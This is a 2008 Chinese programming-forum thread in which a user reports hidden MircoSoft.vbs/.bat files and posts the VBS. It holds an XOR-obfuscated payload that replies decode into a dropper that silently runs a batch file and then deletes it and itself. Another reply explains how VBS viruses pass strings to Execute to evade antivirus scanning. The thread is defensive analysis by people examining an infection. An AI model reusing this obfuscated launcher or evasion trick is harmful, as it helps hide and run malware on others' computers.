亲,您未登录哦! 登录 | 注册
首页  |  社区  |  工具箱  |  代码库  |  博客  |  招聘  |  文章  |  新闻  |  下载  |  读书
回 帖 发 新 帖 刷新版面

主题:MircoSoft.vbs

moz [专家分:37620] 发布于 2008-02-21 21:41:00

今天发现C盘根目录下有两个隐藏文件
MircoSoft.bat  (这个文件应该不是BAT文件,用记事本打开来是二进制代码)
MircoSoft.vbs  
第二个文件用记事本打开后内容如下:

Function fan(ntD)
For i=1 to Len(ntD) Step 2
fan=fan & Chr(CLng("&H" & Mid(ntD,i,2)) Xor 23)
Next
End Function
Nrb="587937526565786537457264627A723759726F631A1D44726337447F727B7B372A3754657276637258757D7274633F35406474657E676339447F727B7B353E1A1D447F727B7B396562793F35742D4B7A7E746578647871636439757663353E1A1D64726337447F727B7B2A5978637F7E79701A1D44726337716478372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D404474657E676339447B7272673726272727371A1D5E713771647839517E7B72526F7E6463643F35742D4B7A7E746578647871636439757663353E37437F7279377164783953727B726372517E7B723F35742D4B7A7E746578647871636439757663353E1A1D7164783953727B726372517E7B723F404474657E6763394474657E676359767A723E"
EXEC fan(Nrb)
本帖地址:  http://bbs.pfan.cn/post/267877.html

回复列表 (共6个回复)

沙发

老大徒伤悲 [专家分:29120] 发布于 2008-02-21 21:53:00

第二个文件的主要内容是:
On Error Resume Next
Set Shell = CreateObject("Wscript.Shell")
Shell.run("c:\microsofts.bat")
set Shell=Nothing
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 
If fso.FileExists("c:\microsofts.bat") Then fso.DeleteFile("c:\microsofts.bat")
fso.DeleteFile(WScript.ScriptName)

板凳

我是大喊三 [专家分:3010] 发布于 2008-02-21 22:15:00

作了加密处理?病毒吧?

3 楼

moz [专家分:37620] 发布于 2008-02-22 13:00:00

我尝试了几次,
VBS里是没有EXEC这个命令的,
也许是一个自定义过程.

但我当时因为那个BAT文件的存在,所以不敢运行,
而把那个EXEC改成了MSGBOX,然后得到一楼的代码.

然后又想到VBS的函数运算是从右到左的,
比如是:
EXEC MSGBOX(123)
明明第一个关键字无效,还是需要先计算后一个函数值后才会出错.
再加上那一行 On Error

但让我想不明白的是,代码已经全部在这里了,我删掉BAT文件后,
现在已经无法顺利运行了. 是不是我改了什么地方? 还是它本身是使用PECMD运行的?

4 楼

老大徒伤悲 [专家分:29120] 发布于 2008-02-22 14:58:00

EXEC应该是一个过程,那段代码只是过程的参数。

5 楼

我是大喊三 [专家分:3010] 发布于 2008-02-22 23:30:00

2)巧妙运用Execute函数 
   
  用过VBS程序的朋友是否会觉得奇怪:当一个正常程序中用到了FileSystemObject对象的时候,有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高,但是有些VBS脚本病毒同样采用了FileSystemObject对象,为什么却又没有任何警告呢?原因很简单,就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时,会检查程序中是否声明使用了FileSystemObject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,就可以躲避某些反病毒软件。 


这是我搜索到的。应该是EXECUTE方法吧?你确认你的代码不是这个?

6 楼

我是大喊三 [专家分:3010] 发布于 2008-02-22 23:36:00

象execute "msgbox 1" 可以运行,可以把构成整个程序的字符串放到里面解析执行

我来回复

您尚未登录,请登录后再回复。点此登录或注册

程序员工具箱 new

  • 安卓APK权限检测
  • C语言题在线测试
  • 在线API接口测试
  • 在线Markdown编辑器
  • 域名whois查询
  • 响应式网页测试
  • PHP手册
  • HTTP状态码
  • 占位图片生成
  • 营销号生成器
  • 更多工具

    • 代码片段

  • 模拟键盘(不可按)
  • 碰撞的唐三
  • 精彩奥运热点赛事的实时采集
  • 获取天气动态信息
  • 文件查找
  • python大数据抓取京东电脑销量数据
  • 爬虫技术不仅仅支持数据采集
  • 抓取脉脉APP上的职业信息
  • 爬虫中多线程的运用
  • 四则运算以及一元二次方程
  • 欢迎来共享你的NB代码

    • 本版新帖

  • 网络编程之winsock控件简介使用方法
  • 发现一个极棒的免费BASIC
  • 如何使用api函数
  • 谁有计算表达式的程序?
  • Visual Basic讨论版任命eerfaone为本版版主,大家鼓掌!! 
  • 各位大侠请了,怎么在vb中利用文本文件的资源?谢谢。
  • 怎样用VB6.0编写BO程序(木马程序)
  • 请教一个问题?
  • 汉字编码原理,atcc进来看看!!!
  • 不调用API来链接个人主页及个人邮箱的技巧代码
  • vb实现远程控制
  • 大哥们 救命呀
  • VB 6.0中类聚集关系的实现 
  • VB6编程中如何获取硬盘分区信息 
  • 要在1-10之间找4个不重复的随机数。请教!